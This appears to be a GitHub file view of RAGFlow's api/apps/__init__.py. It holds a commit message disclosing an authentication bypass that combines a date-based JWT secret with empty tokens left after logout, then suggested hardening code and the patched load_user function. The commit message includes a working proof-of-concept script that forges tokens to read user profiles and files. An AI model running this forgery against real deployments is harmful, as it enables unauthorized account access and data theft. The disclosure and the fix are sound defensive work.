
__init__.py 5.4KB

Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)

### Description

There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.

### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token

**Flow Path:**

1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty access_token
5. **Sink:** Authentication succeeds, returning first user with empty access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys


def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")

    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]

    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)

        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()


if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**

1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials

**Version:** 0.19.0

@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
5 months ago
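The first flaw in the commit message is that `SECRET_KEY` defaults to `str(date.today())`, which anyone can guess. The sketch below shows one way a less predictable default could be chosen. It is not taken from the RAGFlow source: the helper name `resolve_secret_key` and the environment variable `RAGFLOW_SECRET_KEY` are hypothetical and used only for illustration.

```python
import os
import secrets


def resolve_secret_key(env_var: str = "RAGFLOW_SECRET_KEY") -> str:
    """Return an explicitly configured secret, or a fresh random one.

    Both the function name and the default environment variable name are
    assumptions made for this example; they do not appear in the source.
    """
    configured = os.environ.get(env_var, "").strip()
    if configured:
        # An operator-supplied secret always wins.
        return configured
    # Fallback: 32 random bytes from the OS CSPRNG, rendered as 64 hex chars.
    return secrets.token_hex(32)


if __name__ == "__main__":
    key = resolve_secret_key()
    print(f"Secret key length: {len(key)}")
```

A random fallback has a cost: tokens signed before a restart stop validating, and separate worker processes would each generate a different key unless the value is shared through configuration. For multi-process deployments an explicitly configured secret is probably the safer choice.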
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import logging
from importlib.util import module_from_spec, spec_from_file_location
from pathlib import Path
from flask import Blueprint, Flask
from werkzeug.wrappers.request import Request
from flask_cors import CORS
from flasgger import Swagger
from itsdangerous.url_safe import URLSafeTimedSerializer as Serializer

from api.db import StatusEnum
from api.db.db_models import close_connection
from api.db.services import UserService
from api.utils import CustomJSONEncoder, commands

from flask_mail import Mail
from flask_session import Session
from flask_login import LoginManager
from api import settings
from api.utils.api_utils import server_error_response
from api.constants import API_VERSION

__all__ = ["app"]

Request.json = property(lambda self: self.get_json(force=True, silent=True))

app = Flask(__name__)
smtp_mail_server = Mail()

# Add this at the beginning of your file to configure Swagger UI
swagger_config = {
    "headers": [],
    "specs": [
        {
            "endpoint": "apispec",
            "route": "/apispec.json",
            "rule_filter": lambda rule: True,  # Include all endpoints
            "model_filter": lambda tag: True,  # Include all models
        }
    ],
    "static_url_path": "/flasgger_static",
    "swagger_ui": True,
    "specs_route": "/apidocs/",
}

swagger = Swagger(
    app,
    config=swagger_config,
    template={
        "swagger": "2.0",
        "info": {
            "title": "RAGFlow API",
            "description": "",
            "version": "1.0.0",
        },
        "securityDefinitions": {
            "ApiKeyAuth": {"type": "apiKey", "name": "Authorization", "in": "header"}
        },
    },
)

CORS(app, supports_credentials=True, max_age=2592000)
app.url_map.strict_slashes = False
app.json_encoder = CustomJSONEncoder
app.errorhandler(Exception)(server_error_response)

## convenience for dev and debug
# app.config["LOGIN_DISABLED"] = True
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
app.config["MAX_CONTENT_LENGTH"] = int(
    os.environ.get("MAX_CONTENT_LENGTH", 1024 * 1024 * 1024)
)

Session(app)
login_manager = LoginManager()
login_manager.init_app(app)

commands.register_commands(app)


def search_pages_path(pages_dir):
    app_path_list = [
        path for path in pages_dir.glob("*_app.py") if not path.name.startswith(".")
    ]
    api_path_list = [
        path for path in pages_dir.glob("*sdk/*.py") if not path.name.startswith(".")
    ]
    app_path_list.extend(api_path_list)
    return app_path_list


def register_page(page_path):
    path = f"{page_path}"

    page_name = page_path.stem.removesuffix("_app")
    module_name = ".".join(
        page_path.parts[page_path.parts.index("api"): -1] + (page_name,)
    )

    spec = spec_from_file_location(module_name, page_path)
    page = module_from_spec(spec)
    page.app = app
    page.manager = Blueprint(page_name, module_name)
    sys.modules[module_name] = page
    spec.loader.exec_module(page)
    page_name = getattr(page, "page_name", page_name)
    sdk_path = "\\sdk\\" if sys.platform.startswith("win") else "/sdk/"
    url_prefix = (
        f"/api/{API_VERSION}" if sdk_path in path else f"/{API_VERSION}/{page_name}"
    )

    app.register_blueprint(page.manager, url_prefix=url_prefix)
    return url_prefix


pages_dir = [
    Path(__file__).parent,
    Path(__file__).parent.parent / "api" / "apps",
    Path(__file__).parent.parent / "api" / "apps" / "sdk",
]

client_urls_prefix = [
    register_page(path) for dir in pages_dir for path in search_pages_path(dir)
]


@login_manager.request_loader
def load_user(web_request):
    jwt = Serializer(secret_key=settings.SECRET_KEY)
    authorization = web_request.headers.get("Authorization")
    if authorization:
        try:
            access_token = str(jwt.loads(authorization))

            if not access_token or not access_token.strip():
                logging.warning("Authentication attempt with empty access token")
                return None

            # Access tokens should be UUIDs (32 hex characters)
            if len(access_token.strip()) < 32:
                logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars")
                return None

            user = UserService.query(
                access_token=access_token, status=StatusEnum.VALID.value
            )
            if user:
                if not user[0].access_token or not user[0].access_token.strip():
                    logging.warning(f"User {user[0].email} has empty access_token in database")
                    return None
                return user[0]
            else:
                return None
        except Exception as e:
            logging.warning(f"load_user got exception {e}")
            return None
    else:
        return None


@app.teardown_request
def _db_close(exc):
    close_connection()
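The token checks inside `load_user()` (reject empty or whitespace-only values, reject anything shorter than 32 characters) can be pulled into a small pure function that is easy to unit-test without Flask or a database. The sketch below is one possible shape, not code from the repository: the name `normalize_access_token` is hypothetical. The hex-only pattern is stricter than the length check in `load_user()` and assumes tokens are stored as 32-character hex UUIDs, as the source comment suggests.

```python
import re
from typing import Optional

# Assumption: stored access tokens are exactly 32 hex characters (UUID hex form).
_HEX32 = re.compile(r"[0-9a-fA-F]{32}")


def normalize_access_token(raw: object) -> Optional[str]:
    """Return the stripped token if it looks like a UUID hex string, else None.

    Hypothetical helper for illustration; load_user() performs the first two
    checks inline and does not apply the hex pattern.
    """
    token = str(raw).strip() if raw is not None else ""
    if not token:
        # Empty token, e.g. the value left behind after logout.
        return None
    if len(token) < 32:
        # Too short to be a UUID hex string.
        return None
    if not _HEX32.fullmatch(token):
        # Stricter than the original check: wrong characters or wrong length.
        return None
    return token


if __name__ == "__main__":
    for candidate in ["", "   ", "abc", "0123456789abcdef0123456789abcdef"]:
        print(repr(candidate), "->", normalize_access_token(candidate))
```

With a helper like this, `load_user()` would only query `UserService` when the result is not `None`, so a forged token that decodes to an empty string never reaches the database lookup.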